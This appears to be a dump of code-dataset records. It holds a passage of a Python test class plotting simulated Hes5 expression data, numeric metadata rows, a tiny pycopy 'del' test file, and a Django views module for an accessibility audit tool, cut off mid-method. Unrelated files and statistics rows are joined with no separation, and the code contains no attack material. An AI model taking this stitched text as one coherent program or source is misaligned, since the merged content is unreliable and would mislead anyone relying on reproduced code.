# analytic_signal = scipy.signal.hilbert(signal_values)
analytic_signal = scipy.signal.hilbert(signal_values - np.mean(signal_values))
phase = np.angle(analytic_signal)
phase_reset_indices = np.where(np.diff(np.signbit(phase).astype(int))>0)
phase_reset_times = time_points[phase_reset_indices]
extracted_periods = np.diff(phase_reset_times)
print(extracted_periods)
print(np.mean(extracted_periods))
plt.plot(time_points, signal_values, label = 'signal', lw = 0.1)
plt.vlines(phase_reset_times, 45000,55000, color = 'black', zorder = 10, lw = .5)
plt.xlabel("Time [min]")
plt.ylabel("Expression")
implemented_periods = hes5.get_period_measurements_from_signal(time_points, signal_values)
self.assertTrue(np.array_equal(implemented_periods, extracted_periods))
plt.subplot(122)
plt.plot(time_points, phase, label = 'phase', lw = .1)
plt.vlines(phase_reset_times, -1,1, color = 'black', zorder = 10, lw = .5)
plt.xlabel("Time [min]")
plt.ylabel("Phase")
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','initial_hilbert_on_data.pdf'))
plt.figure(figsize = (6.5,2.5))
plt.subplot(121)
smoothened_signal = scipy.signal.savgol_filter(signal_values,
75,
3)
# analytic_signal = scipy.signal.hilbert(signal_values)
analytic_signal = scipy.signal.hilbert(smoothened_signal - np.mean(smoothened_signal))
phase = np.angle(analytic_signal)
phase_reset_indices = np.where(np.diff(np.signbit(phase).astype(int))>0)
phase_reset_times = time_points[phase_reset_indices]
extracted_periods = np.diff(phase_reset_times)
print(extracted_periods)
print(np.mean(extracted_periods))
plt.plot(time_points, smoothened_signal, label = 'signal', lw = 0.1)
plt.vlines(phase_reset_times, 45000,55000, color = 'black', zorder = 10, lw = .5)
plt.xlabel("Time [min]")
plt.ylabel("Expression")
implemented_periods = hes5.get_period_measurements_from_signal(time_points, signal_values, smoothen = True)
self.assertTrue(np.array_equal(implemented_periods, extracted_periods))
plt.subplot(122)
plt.plot(time_points, phase, label = 'phase', lw = .1)
plt.vlines(phase_reset_times, -1,1, color = 'black', zorder = 10, lw = .5)
plt.xlabel("Time [min]")
plt.ylabel("Phase")
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','initial_hilbert_on_data_smoothened.pdf'))
def xest_ngn_hes5_toy_model(self):
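# Toy phase-relationship study for Hes5 and Ngn: four synthetic scenarios
# (uncorrelated trend, in-phase, anti-phase, growing amplitude) are each
# shown as a time course and as a Hes5-vs-Ngn trajectory.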
times = np.linspace(0,15,1000)
noise_1 = np.random.randn(len(times))
noise_2 = np.random.randn(len(times))
# noise_1 = 0
# noise_2 = 0
these_hes5_data = 2*np.sin(2*np.pi*times/4.0)-times + 15 + noise_1
these_ngn_data = times + noise_2
plt.figure(figsize = (6.5,6.5))
plt.subplot(421)
plt.plot(times, these_hes5_data, label = 'Hes5')
plt.plot(times, these_ngn_data, label = 'Ngn')
plt.xlabel('Time')
plt.ylabel('Expression')
plt.legend(loc = 'upper left')
plt.subplot(422)
plt.plot(these_hes5_data, these_ngn_data)
plt.xlabel('Hes5 expression')
plt.ylabel('Ngn expression')
these_ngn_data = 2*np.sin(2*np.pi*times/4.0)+times + noise_2
plt.subplot(423)
plt.plot(times, these_hes5_data)
plt.plot(times, these_ngn_data)
plt.xlabel('Time')
plt.ylabel('Expression')
plt.subplot(424)
plt.plot(these_hes5_data, these_ngn_data)
plt.xlabel('Hes5 expression')
plt.ylabel('Ngn expression')
these_ngn_data = 2*np.sin(2*np.pi*times/4.0+np.pi)+times + noise_2
plt.subplot(425)
plt.plot(times, these_hes5_data)
plt.plot(times, these_ngn_data)
plt.xlabel('Time')
plt.ylabel('Expression')
plt.subplot(426)
plt.plot(these_hes5_data, these_ngn_data)
plt.xlabel('Hes5 expression')
plt.ylabel('Ngn expression')
these_ngn_data = np.sin(2*np.pi*times/4.0)*times/2 + times/2 + noise_2
plt.subplot(427)
plt.plot(times, these_hes5_data)
plt.plot(times, these_ngn_data)
plt.xlabel('Time')
plt.ylabel('Expression')
plt.subplot(428)
plt.plot(these_hes5_data, these_ngn_data)
plt.xlabel('Hes5 expression')
plt.ylabel('Ngn expression')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','hes5_ngn_toy_model.pdf'))
def xest_make_variance_vs_mean_bayesian_posterior_prediction(self):
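# Posterior prediction of the mean-variance relationship: scatter and
# kernel density estimates of simulated variance against mean HES5, with
# the variance floor corresponding to a 5% relative standard deviation,
# i.e. (0.05*mean)^2, drawn as a reference line.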
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('total number of accepted samples')
print(len(my_posterior_samples))
my_model_results = model_results[accepted_indices]
my_figure = plt.figure(figsize= (4.5,1.9))
plt.subplot(121)
all_means = my_model_results[:,0]
all_absolute_standard_deviations = my_model_results[:,1]*my_model_results[:,0]
all_variances = all_absolute_standard_deviations*all_absolute_standard_deviations
lower_limit = all_means*0.05
lower_limit = lower_limit*lower_limit
plt.scatter(all_means, all_variances,rasterized = True, alpha = 0.1, s = 1)
plt.plot(all_means, lower_limit)
plt.ylim(0,0.7e8)
plt.ylabel("Variance")
plt.xlabel("Mean HES5")
# plt.xlim(0.03,0.2)
# plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.subplot(122)
sns.kdeplot(all_means, all_variances, linewidths = 0.5, bw = 0.2)
plt.plot(all_means, lower_limit)
plt.ylim(0,0.7e8)
plt.ylabel("Variance")
plt.xlabel("Mean HES5")
plt.tight_layout()
file_name = os.path.join(os.path.dirname(__file__), 'output',
'mean_vs_variance_investigation')
plt.savefig(file_name + '.pdf', dpi = 600)
plt.savefig(file_name + '.png', dpi = 600)
def xest_plot_mean_and_variance_dependence_on_protein_degradation(self):
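# Sweep-based view of how mean and variance co-vary across the posterior:
# each accepted sample's relative repression-threshold sweep is plotted as
# mean vs sweep value, variance vs sweep value, and variance vs mean.
# (Variable names still say 'degradation', apparently left over from an
# earlier protein-degradation sweep kept in the comments.)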
my_figure = plt.figure( figsize = (2.5, 5.7) )
parameter_name = 'repression_threshold'
# parameter_name = 'protein_degradation_rate'
my_degradation_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'data',
'extended_relative_sweeps_repression_threshold.npy'))
# 'repeated_degradation_sweep.npy'))
# print(my_degradation_sweep_results[0,:,0])
# print(np.log(2)/90)
# my_filtered_indices = np.where(np.logical_and(my_degradation_sweep_results[:,9,4] -
# my_degradation_sweep_results[:,3,4]>
# my_degradation_sweep_results[:,3,4]*1.0,
# my_degradation_sweep_results[:,3,4]>0.1))
# print(len(my_filtered_indices[0]))
# print(len(my_degradation_sweep_results))
# my_degradation_sweep_results = my_degradation_sweep_results[my_filtered_indices]
x_coord = -0.3
y_coord = 1.05
plt.subplot(311)
for results_table in my_degradation_sweep_results:
plt.plot(results_table[:,0],
results_table[:,1], color = 'C0', alpha = 0.02, zorder = 0)
# plt.axvline( np.log(2)/90, color = 'black' )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('relative repression threshold') # the sweep loaded above varies the repression threshold, not degradation
plt.ylim(40000,90000)
plt.ylabel('Mean Hes5')
# plt.ylim(40000,100000)
# plt.ylim(0,1)
# plt.xlim(0,np.log(2)/15.)
# plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
plt.subplot(312)
for results_table in my_degradation_sweep_results:
variances = results_table[:,2]*results_table[:,1]
variances = variances*variances
plt.plot(results_table[:,0],
variances, color = 'C0', alpha = 0.02, zorder = 0)
# plt.axvline( np.log(2)/90, color = 'black' )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('relative repression threshold')
plt.ylabel('Variance')
# plt.ylim(40000,100000)
# plt.ylim(0,1)
# plt.xlim(0,np.log(2)/15.)
# plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
plt.subplot(313)
for results_table in my_degradation_sweep_results:
variances = results_table[:,2]*results_table[:,1]
variances = variances*variances
plt.plot(results_table[:,1],
variances, color = 'C0', alpha = 0.005, zorder = 0)
# plt.axvline( np.log(2)/90, color = 'black' )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('HES5 mean')
plt.ylim(0,1e8)
plt.ylabel('Variance')
plt.xlim(40000,90000)
# plt.ylim(0,0.5e8)
# plt.ylim(40000,100000)
# plt.ylim(0,1)
# plt.xlim(0,np.log(2)/15.)
# plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
plt.tight_layout()
file_name = os.path.join(os.path.dirname(__file__),
'output','hes5_variances_means_vs_' + parameter_name)
plt.savefig(file_name + '.pdf', dpi = 600)
plt.savefig(file_name + '.png', dpi = 600)
def xest_make_plot_for_paper(self):
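# Condensed version of the previous figure for the paper: the per-sample
# variance-vs-mean curves from the repression-threshold sweep are
# summarised by their mean and a +/- one standard deviation band.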
parameter_name = 'repression_threshold'
# parameter_name = 'protein_degradation_rate'
my_degradation_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'data',
'extended_relative_sweeps_repression_threshold.npy'))
#
means = my_degradation_sweep_results[:,:,1]
standard_deviations = my_degradation_sweep_results[:,:,2]
variances = means*standard_deviations
variances = variances*variances
mean_means = np.mean(means, axis = 0)
mean_variances = np.mean(variances, axis = 0)
std_variances = np.std(variances, axis = 0)
my_figure = plt.figure( figsize = (2.5, 1.9) )
# for results_table in my_degradation_sweep_results:
# variances = results_table[:,2]*results_table[:,1]
# variances = variances*variances
# plt.plot(results_table[:,1],
# variances, color = 'C0', alpha = 0.005, zorder = 0)
# plt.axvline( np.log(2)/90, color = 'black' )
plt.plot(mean_means, mean_variances, color = 'black', lw = 0.5)
plt.plot(mean_means, mean_variances - std_variances, color = 'black', lw = 0.25)
plt.plot(mean_means, mean_variances + std_variances, color = 'black', lw = 0.25)
plt.fill_between(mean_means, mean_variances - std_variances, mean_variances + std_variances, alpha = 0.5)
# plt.errorbar(mean_means, mean_variances,yerr=std_variances)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('HES5 mean')
# plt.ylim(0,1e8)
plt.ylabel('Variance')
plt.xlim(40000,90000)
# plt.ylim(0,0.5e8)
# plt.ylim(40000,100000)
# plt.ylim(0,1)
# plt.xlim(0,np.log(2)/15.)
# plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
plt.tight_layout()
file_name = os.path.join(os.path.dirname(__file__),
'output','hes5_variances_means_vs_' + parameter_name + '_plot_for_paper')
plt.savefig(file_name + '.pdf', dpi = 600)
plt.savefig(file_name + '.png', dpi = 600)
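# Editor's sketch (assumes the saved sweep is a 3-D array of shape
# (n_posterior_samples, n_parameter_values, n_summary_columns), with the mean
# in column 1 and the CV in column 2, as used above). Summarising it outside
# the test class might look like:
#
#   import numpy as np
#   sweep = np.load('extended_relative_sweeps_repression_threshold.npy')
#   means = sweep[:, :, 1]
#   variances = (sweep[:, :, 2] * means)**2
#   band_centre = variances.mean(axis=0)
#   band_width = variances.std(axis=0)   # the shaded band plotted above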
| 57.483326 | 175 | 0.530912 | 56,390 | 544,712 | 4.804274 | 0.019596 | 0.047041 | 0.028171 | 0.044826 | 0.919454 | 0.901847 | 0.881412 | 0.866961 | 0.852178 | 0.84285 | 0 | 0.056921 | 0.362691 | 544,712 | 9,475 | 176 | 57.489393 | 0.723471 | 0.195377 | 0 | 0.780781 | 0 | 0 | 0.098874 | 0.035568 | 0 | 0 | 0 | 0 | 0.002673 | 1 | 0.021239 | false | 0.000149 | 0.001634 | 0 | 0.023021 | 0.041883 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4bf29891a12cfbe58cd0c92f7eb0643aeea7c381 | 25 | py | Python | ast/testdata/del.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | 126 | 2019-07-19T14:42:41.000Z | 2022-03-21T22:22:19.000Z | ast/testdata/del.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | 38 | 2019-08-28T01:46:31.000Z | 2022-03-17T05:46:51.000Z | ast/testdata/del.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | 55 | 2019-08-02T09:32:33.000Z | 2021-12-22T11:25:51.000Z | del c
del a, b
del a, b,
| 6.25 | 9 | 0.56 | 8 | 25 | 1.75 | 0.5 | 0.571429 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.32 | 25 | 3 | 10 | 8.333333 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ef3d95ca2d2af1c71aa7ac2b5940d2d382efef40 | 49,971 | py | Python | faeAuditor/auditGroupResults/views.py | opena11y/fae-auditor | ea9099b37b77ddc30092b0cdd962647c92b143a7 | [
"Apache-2.0"
] | 2 | 2018-02-28T19:03:28.000Z | 2021-09-30T13:40:23.000Z | faeAuditor/auditGroupResults/views.py | opena11y/fae-auditor | ea9099b37b77ddc30092b0cdd962647c92b143a7 | [
"Apache-2.0"
] | 6 | 2020-02-11T21:53:58.000Z | 2022-02-10T07:57:58.000Z | faeAuditor/auditGroupResults/views.py | opena11y/fae-auditor | ea9099b37b77ddc30092b0cdd962647c92b143a7 | [
"Apache-2.0"
] | 1 | 2019-12-05T06:05:20.000Z | 2019-12-05T06:05:20.000Z | """
Copyright 2014-2016 University of Illinois
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
file: auditGroupResults/views.py
Author: Jon Gunderson
"""
from __future__ import absolute_import
from django.shortcuts import render
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.http import JsonResponse
from django.shortcuts import redirect
from django.contrib import messages
from django.views.generic import TemplateView
from django.views.generic import CreateView
from django.views.generic import FormView
from django.views.generic import RedirectView
from django.contrib.auth.models import User
from auditResults.models import AuditResult
from .models import AuditGroupResult
from .models import AuditGroupRuleCategoryResult
from .models import AuditGroupGuidelineResult
from .models import AuditGroupRuleScopeResult
from .models import AuditGroupRuleResult
from auditResults.models import AuditRuleCategoryResult
from auditResults.models import AuditGuidelineResult
from auditResults.models import AuditRuleScopeResult
from auditResults.models import AuditRuleResult
from auditGroup2Results.models import AuditGroup2Result
from auditGroup2Results.models import AuditGroup2RuleCategoryResult
from auditGroup2Results.models import AuditGroup2GuidelineResult
from auditGroup2Results.models import AuditGroup2RuleScopeResult
from auditGroup2Results.models import AuditGroup2RuleResult
from websiteResults.models import WebsiteResult
from websiteResults.models import WebsiteGuidelineResult
from websiteResults.models import WebsiteRuleScopeResult
from websiteResults.models import WebsiteRuleCategoryResult
from pageResults.models import PageResult
from pageResults.models import PageRuleCategoryResult
from pageResults.models import PageGuidelineResult
from pageResults.models import PageRuleScopeResult
from rulesets.models import Ruleset
from ruleCategories.models import RuleCategory
from wcag20.models import Guideline
from rules.models import RuleScope
from contacts.models import Announcement
from itertools import chain
from django.urls import reverse_lazy, reverse
from django.contrib.auth.mixins import LoginRequiredMixin
from audits.resultNavigationMixin import ResultNavigationMixin
# ==============================================================
#
# Audit Group Report Views
#
# ==============================================================
class GroupResultsView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
ar = AuditResult.objects.get(slug=result_slug)
agrs = ar.group_results.all()
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.create_result_navigation()
for agr in agrs:
agr.title = agr.get_title()
agr.href = reverse('group_results_audit_group', args=[result_slug, rule_grouping, agr.slug])
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_group_results'] = agrs
return context
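# Editor's sketch (hypothetical urls.py wiring inferred from the reverse()
# names used in these views; the project's real route patterns may differ):
#
#   from django.urls import path
#   from . import views
#
#   urlpatterns = [
#       path('<slug:result_slug>/<slug:rule_grouping>/group/',
#            views.GroupResultsView.as_view(), name='group_results'),
#       path('<slug:result_slug>/<slug:rule_grouping>/group/<slug:audit_group_slug>/',
#            views.GroupResultsAuditGroupView.as_view(),
#            name='group_results_audit_group'),
#   ]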
# All rule views
# ==============
class GroupResultsAuditGroupView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2rs = agr.group2_results.all()
wsrs = agr.ws_results.filter(status='C')
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.create_result_navigation()
for ag2r in ag2rs:
ag2r.title = ag2r.get_title()
ag2r.website_count = ag2r.get_website_count()
ag2r.page_count = ag2r.get_page_count()
ag2r.href = reverse('group_results_audit_group_audit_group2', args=[result_slug, rule_grouping, audit_group_slug, ag2r.slug])
for wsr in wsrs:
wsr.href = reverse('group_results_audit_group_website', args=[result_slug, rule_grouping, audit_group_slug, wsr.slug])
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_group_result'] = agr
context['audit_group_results'] = ag2rs
context['website_results'] = wsrs
return context
# ======================
# All rule group 2 views
# ======================
class GroupResultsAuditGroupAuditGroup2View(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_audit_group2.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupAuditGroup2View, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2r = agr.group2_results.get(slug=audit_group2_slug)
wsrs = ag2r.ws_results.filter(status='C')
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.create_result_navigation()
for wsr in wsrs:
wsr.href = reverse('group_results_audit_group_audit_group2_website', args=[result_slug, rule_grouping, audit_group_slug, audit_group2_slug, wsr.slug])
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_results'] = wsrs
return context
class GroupResultsAuditGroupAuditGroup2WebsiteView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_audit_group2_website.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupAuditGroup2WebsiteView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2r = agr.group2_results.get(slug=audit_group2_slug)
wsrs = ag2r.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
prs = wsr.page_all_results.all()
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug)
self.result_nav.create_result_navigation()
for pr in prs:
pr.page_num = pr.page_number
pr.title = pr.get_title()
pr.href = reverse('group_results_audit_group_audit_group2_website_page', args=[result_slug, rule_grouping, audit_group_slug, audit_group2_slug, website_slug, pr.page_number])
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_results'] = prs
return context
class GroupResultsAuditGroupAuditGroup2WebsitePageView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_audit_group2_website_page.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupAuditGroup2WebsitePageView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2r = agr.group2_results.get(slug=audit_group2_slug)
wsrs = ag2r.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prrs = pr.page_rule_results.all()
for prr in prrs:
prr.title = prr.rule.summary_html
prr.href = reverse('group_results_audit_group_audit_group2_website_page_rule', args=[result_slug, rule_grouping, audit_group_slug, audit_group2_slug, website_slug, page_num, prr.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
context['page_num'] = page_num
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_results'] = prrs
return context
class GroupResultsAuditGroupAuditGroup2WebsitePageRuleView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_audit_group2_website_page_rule.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupAuditGroup2WebsitePageRuleView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
rule_slug = kwargs['rule_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2r = agr.group2_results.get(slug=audit_group2_slug)
wsrs = ag2r.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prr = pr.page_rule_results.get(slug=rule_slug)
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.set_rule(rule_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_result'] = prr
context['rule'] = prr.rule
return context
# ======================
# All rule website views
# ======================
class GroupResultsAuditGroupWebsiteView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_website.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupWebsiteView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
wsrs = agr.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
prs = wsr.page_all_results.all()
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug)
self.result_nav.create_result_navigation()
for pr in prs:
pr.page_num = pr.page_number
pr.title = pr.get_title()
pr.href = reverse('group_results_audit_group_website_page', args=[result_slug, rule_grouping, audit_group_slug, website_slug, pr.page_number])
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_group_result'] = agr
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_results'] = prs
return context
class GroupResultsAuditGroupWebsitePageView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_website_page.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupWebsitePageView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
wsrs = agr.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prrs = pr.page_rule_results.all()
for prr in prrs:
prr.title = prr.rule.summary_html
prr.href = reverse('group_results_audit_group_website_page_rule', args=[result_slug, rule_grouping, audit_group_slug, website_slug, page_num, prr.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
context['page_num'] = page_num
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_group_result'] = agr
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_results'] = prrs
return context
class GroupResultsAuditGroupWebsitePageRuleView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_website_page_rule.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupWebsitePageRuleView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
rule_slug = kwargs['rule_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
wsrs = agr.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prr = pr.page_rule_results.get(slug=rule_slug)
r = prr.rule
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
